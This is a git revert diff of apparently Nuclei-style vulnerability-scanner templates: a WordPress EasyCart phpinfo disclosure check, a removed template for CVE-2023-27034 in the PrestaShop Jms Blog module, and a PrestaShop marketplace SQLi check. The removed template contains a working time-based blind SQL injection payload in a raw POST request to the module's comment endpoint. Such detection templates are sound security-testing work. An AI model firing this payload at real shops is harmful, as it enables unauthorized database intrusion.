Revert "Added/Fixed/Updated XXX Template"
This reverts commit dd08abe04e
.
wrong commit message
patch-1
parent
dd08abe04e
commit
cb8cbac9df
|
@ -11,20 +11,13 @@ info:
|
|||
- https://codevigilant.com/disclosure/wp-plugin-wp-easycart-information-disclosure
|
||||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4942
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2014-4942
|
||||
- https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=829290%40wp-easycart&old=827627%40wp-easycart&sfp_email=&sfph_mail=
|
||||
classification:
|
||||
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
|
||||
cvss-score: 5
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
|
||||
cve-id: CVE-2014-4942
|
||||
cwe-id: CWE-200
|
||||
epss-score: 0.01024
|
||||
cpe: cpe:2.3:a:levelfourdevelopment:wp-easycart:*:*:*:*:*:wordpress:*:*
|
||||
tags: wpscan,cve,cve2014,wordpress,wp-plugin,wp,phpinfo,disclosure
|
||||
metadata:
|
||||
max-request: 1
|
||||
framework: wordpress
|
||||
vendor: levelfourdevelopment
|
||||
product: wp-easycart
|
||||
tags: wpscan,cve,cve2014,wordpress,wp-plugin,wp,phpinfo,disclosure
|
||||
|
||||
http:
|
||||
- method: GET
|
||||
|
@ -46,7 +39,7 @@ http:
|
|||
|
||||
extractors:
|
||||
- type: regex
|
||||
part: body
|
||||
group: 1
|
||||
regex:
|
||||
- '>PHP Version <\/td><td class="v">([0-9.]+)'
|
||||
part: body
|
|
@ -1,64 +0,0 @@
|
|||
id: CVE-2023-27034
|
||||
info:
|
||||
name: Blind SQL injection vulnerability in Jms Blog
|
||||
author: MaStErChO
|
||||
severity: critical
|
||||
description: |
|
||||
The module Jms Blog (jmsblog) from Joommasters contains a Blind SQL injection vulnerability. This module is for the PrestaShop e-commerce platform and mainly provided with joo masters PrestaShop themes
|
||||
reference:
|
||||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-27034
|
||||
- https://security.friendsofpresta.org/modules/2023/03/13/jmsblog.html
|
||||
- https://github.com/advisories/GHSA-7jr7-v6gv-m656
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2023-27034
|
||||
cwe-id: CWE-89
|
||||
tags: cve,cve2023,prestashop,prestashop-module,sqli
|
||||
metadata:
|
||||
max-request: 1
|
||||
|
||||
http:
|
||||
- raw:
|
||||
- |
|
||||
POST /jmsblog/news/index.php?action=submitComment&controller=post&fc=module&module=jmsblog&post_id=1 HTTP/1.1
|
||||
Content-Type: multipart/form-data; boundary=----------YWJkMTQzNDcw
|
||||
X-Requested-With: XMLHttpRequest
|
||||
Referer: {{BaseURL}}
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Encoding: gzip,deflate,br
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
|
||||
Host: {{Hostname}}
|
||||
Connection: Keep-alive
|
||||
|
||||
------------YWJkMTQzNDcw
|
||||
Content-Disposition: form-data; name="comment"
|
||||
|
||||
555
|
||||
------------YWJkMTQzNDcw
|
||||
Content-Disposition: form-data; name="customer_name"
|
||||
|
||||
|
||||
------------YWJkMTQzNDcw
|
||||
Content-Disposition: form-data; name="email"
|
||||
|
||||
0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z
|
||||
------------YWJkMTQzNDcw
|
||||
Content-Disposition: form-data; name="post_id"
|
||||
|
||||
5
|
||||
------------YWJkMTQzNDcw
|
||||
Content-Disposition: form-data; name="post_id_comment_reply"
|
||||
|
||||
1
|
||||
------------YWJkMTQzNDcw
|
||||
Content-Disposition: form-data; name="submitComment"
|
||||
|
||||
submitComment=
|
||||
------------YWJkMTQzNDcw--
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'duration>=6'
|
|
@ -1,4 +1,4 @@
|
|||
id: prestashop-apmarketplace-sqli
|
||||
id: prestashop-marketplace-sqli
|
||||
|
||||
info:
|
||||
name: PrestaShop Ap Marketplace SQL Injection
|
||||
|
@ -30,4 +30,5 @@ http:
|
|||
dsl:
|
||||
- 'duration>=6'
|
||||
- 'status_code == 200'
|
||||
- 'contains(header, "PrestaShop")'
|
||||
condition: and
|
Loading…
Reference in New Issue